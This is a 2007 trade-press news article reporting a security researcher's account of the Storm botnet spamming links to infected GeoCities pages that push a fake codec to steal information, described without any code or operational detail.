Please wait while the page is being loaded Skip this advertisement >
ARN

Storm botnet spreading malware through GeoCities

Hackers linked to the vanished Russian Business Network involved, says Trend Micro researcher
Gregg Keizer (Computerworld)  19 November, 2007 07:27:59
Have your say!
Add to Google
ARN Directory | Distributors relevant to this article
Altech Computers , Corporate Computer Resources , Infortech Distribution , Ingram Micro Australia , itX , NewLease
ARN Directory | Vendors relevant to this article
Trend Micro

Storm, the botnet-building Trojan horse, has come up with another twist to dupe users into infecting their PCs with malware, a security researcher said last week.

Longtime clients of the Russian Business Network (RBN), a notorious hacker- and malware-hosting network that mysteriously vanished after shifting operations from St. Petersburg, Russia, to Shanghai are involved in the attack, said Paul Ferguson, network architect at Trend Micro.

Yesterday, Trend watched as existing bots controlled by Storm were seeded with new spam templates that included links to sites on GeoCities, the free Web hosting service owned by Yahoo. Today, Storm kicked off the new attacks. "This has developed into a full-fledged attack vector," Ferguson said.

The GeoCities sites are infected with malicious JavaScript code that redirects the user's browser to secondary URLs hosted in Turkey, Ferguson said. The Turkish URLs, meanwhile, try to persuade the user to download a new codec that's supposedly necessary to view images on the GeoCities sites. According to Trend Micro's analysis, the bogus codec -- which claims to be for the 360-degree IPIX format -- is actually an identity- and information-stealing piece of malware.

Fake codecs have become the latest choice of hackers, with several notable attacks recently relying on users' naivete about what a codec is, why it might be necessary and why they can be untrustworthy. The attacks last week that originated at hacked MySpace pages -- including R&B singer Alicia Keys' -- touted phony codecs, for example.

That Storm has turned to hyping codecs tells Ferguson that the botnet's controllers are nimble and flexible in their approach to social engineering. "They're intertwining codecs with other types of social engineering," he said.

By his reckoning, Storm has become much more than just a name for a malware family. "It's actually a covert channel of distribution for these [bad] guys," he said. "It's a communication network, a way for them to communicate information they want to seed," whether a round of spam touting penny stocks or a new piece of malware. "And it's a way for them to get what they've collected" from the now-compromised computers, he added. "It's a covert network."

Ferguson also said that there was evidence that known RBN customers were responsible for this newest use of Storm's botnet. "Some of the same RBN operators are involved," Ferguson said. "It's some of the same crew."

Comments

Post new comment

Users posting comments agree to the ARN comments policy.
Login or register to link comments to your user profile, or you may also post a comment without being logged in.
The content of this field is kept private and will not be shown publicly.
Enter the fully qualified URL, eg. http://www.example.com/
  • Web page addresses and e-mail addresses turn into links automatically.
  • Allowed HTML tags: <a> <em> <strong> <cite> <code> <ul> <ol> <li> <dl> <dt> <dd>
  • Lines and paragraphs break automatically.

More information about formatting options

Syndicate content
Careerone Job Search
Job seekers Get job alerts | Post your resume online | Interview tips | Ask Kate
Advertisers Click here to advertise your jobs to thousands of job seekers monthly.
 
ARN Distributor Directory
 
Find distributors by name
Find distributors by vendor
Find distributors by location
ARN Vendor Directory
 
Find vendors by name | Find by category
ARN Community Comments
Most Commented
ARN Library


Read Material

RSA - Secure Web Access

What can be done to protect web access? The Web has created a wealth of new opportunities, but as organizations shift from an internal to external focus, the traditional view of identity and access management (IAM) is changing. In many different ways, including regulations around the globe aimed at data protection and other processes, securing web access is creating many new challenges.

Subscribe to ARN

ARN has been the premier provider of information to the Australian IT channel for more than 12 years. As the only weekly publication dedicated to the channel, ARN produces timely, accurate news and analysis about IT business issues, products and services, new technology and market opportunities.
Sponsored Links